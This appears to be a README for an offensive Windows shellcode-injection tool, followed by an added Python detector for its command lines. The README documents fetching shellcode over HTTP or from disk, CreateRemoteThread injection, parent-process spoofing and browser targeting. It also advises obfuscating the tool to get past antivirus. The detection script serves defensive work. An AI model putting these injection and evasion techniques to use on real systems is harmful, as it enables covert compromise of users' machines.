Note: We had a good run for a few years. By now, this triggers most AV, even with obfuscation. Non-trivial obfuscation may still work, though. Anyway, if you wish to use this in any sort of secured environment, you may want to tweak it a bit and add some more subtlety.
This project started out as a fork of ZPS' ProcessInjection. However, I've greatly improved its flexibility from a CLI perspective and added multiple techniques for pulling and injecting shellcode. Shellcode can be pulled dynamically (in bin or base64 format) from either the disk or over HTTP, as opposed to being embedded in the binary.
Additional Techniques yoinked from 3xpl01tc0d3r: https://github.com/3xpl01tc0d3r/ProcessInjection/blob/master/ProcessInjection/Program.cs
Runner Help:
Usage: Runner.exe [options]
Example: Runner.exe targ=http://fun/targ.bin form=bin meth=simple pid=1000
Example: Runner.exe targ=C:\path\to\targ.b64 form=b64 meth=simple pid=self
Example: Runner.exe targ=\\some\share\path\to\targ.b64 form=b64 meth=simple pid=explorer
Example: Runner.exe targ=https://fun/targ.bin parent=1000 spawn=C:\path\to\custom.exe
Example: Runner.exe targ=https://fun/targ.bin parent=explorer spawn=notepad.exe
Defaults:
meth => simple
form => bin
The targ argument can point to a URL or a path on disk. URLs must start with http:// or https://. This file should contain your shellcode. .NET shellcode can be generated via Donut by TheWover.
The form argument tells the runner whether the shellcode is in "binary" format (default) or "base64". Valid values are "bin", "binary", "base64", and "b64". If encoded, the runner will decode it.
The meth argument tells the runner which injection technique to use. Right now, only "simple" injection (the default) is supported, via CreateRemoteThread.
You can either target a live process to inject into (PID / live mode) or use parent spoofing. PID mode requires the pid argument, while parent spoofing requires both parent and spawn.
The pid value accepts a valid PID, a program name to search for (explorer.exe/notepad.exe), or "self". When searching, the PID is resolved from the current session, so the process needs to be in the same session. For "self", the runner will just inject into itself and wait forever. There is an additional alias, "browser", which first attempts to inject into the user's default browser and then blindly checks for running Chrome and IE instances.
The parent argument can be either a valid running PID or a program name (explorer/program.exe). When searching by program name, a running PID for that program must exist in the same session.
The spawn argument tells the runner which program to spawn and inject into. It can be either a fully qualified path to an EXE or a basename like "explorer.exe"; in the latter case the runner searches the $PATH environment variable for the executable. The spawn argument also has a "browser" alias that looks for common browser executables.
- cmd.exe may not work with spawn.
- .NET shellcode: https://github.com/TheWover/donut
- Parent Spoofing: https://github.com/3xpl01tc0d3r/ProcessInjection/blob/master/ProcessInjection/Program.cs
- Process hollowing
- APC Queue
- Clean up Win32
- Simple targets and keys
- Parseable targets via regex
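As an added, defender-side example (not part of this project's code), the following Python scans process-creation command lines for the Runner argument syntax documented in the help section above and labels what each invocation would do (remote shellcode fetch, base64 payload, parent spoofing, self-injection). The log lines are constructed samples in a Sysmon-like "CommandLine:" shape; the field names and finding labels are my own.

```python
import re
from urllib.parse import urlparse

# key=value options documented in the Runner help; matched case-insensitively.
ARG_RE = re.compile(r"\b(targ|form|meth|pid|parent|spawn)=(\S+)", re.IGNORECASE)


def parse_runner_args(cmdline):
    """Extract Runner-style key=value options from one command line."""
    return {k.lower(): v for k, v in ARG_RE.findall(cmdline)}


def classify(cmdline):
    """Return finding labels for one command line, or [] if it is not Runner-like."""
    args = parse_runner_args(cmdline)
    # targ is mandatory; an injection target (pid) or spoofing pair (parent/spawn) must follow.
    if "targ" not in args or not ({"pid", "parent", "spawn"} & set(args)):
        return []
    findings = ["runner_cli_pattern"]
    targ = args["targ"]
    if targ.lower().startswith(("http://", "https://")):
        findings.append("remote_shellcode_fetch:" + urlparse(targ).netloc)
    elif targ.startswith("\\\\"):  # UNC share path, as in the help examples
        findings.append("unc_shellcode_path")
    if args.get("form", "bin").lower() in ("b64", "base64"):
        findings.append("base64_payload")
    if "parent" in args and "spawn" in args:
        findings.append("ppid_spoofing:parent=%s,spawn=%s" % (args["parent"], args["spawn"]))
    elif "pid" in args:
        pid = args["pid"].lower()
        if pid == "self":
            findings.append("self_injection")
        elif pid == "browser":
            findings.append("browser_target_alias")
        elif pid.isdigit():
            findings.append("inject_pid:" + pid)
        else:
            findings.append("inject_process_name:" + pid)
    return findings


def scan(log_lines):
    """Run classify() over a list of lines; keep only the ones that matched."""
    results = []
    for line in log_lines:
        findings = classify(line)
        if findings:
            results.append((line, findings))
    return results


# Constructed sample telemetry (not real captures); first three mirror the help examples.
SAMPLE_LOG = [
    "CommandLine: C:\\Tools\\Runner.exe targ=https://fun/targ.bin parent=explorer spawn=notepad.exe",
    "CommandLine: Runner.exe targ=C:\\path\\to\\targ.b64 form=b64 meth=simple pid=self",
    "CommandLine: Runner.exe targ=\\\\some\\share\\path\\to\\targ.b64 form=b64 meth=simple pid=explorer",
    "CommandLine: notepad.exe C:\\Users\\a\\notes.txt",
    "CommandLine: ping.exe -n 4 form=b64",  # a lone key is not enough to match
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_LOG):
        print(findings, "<-", line)
```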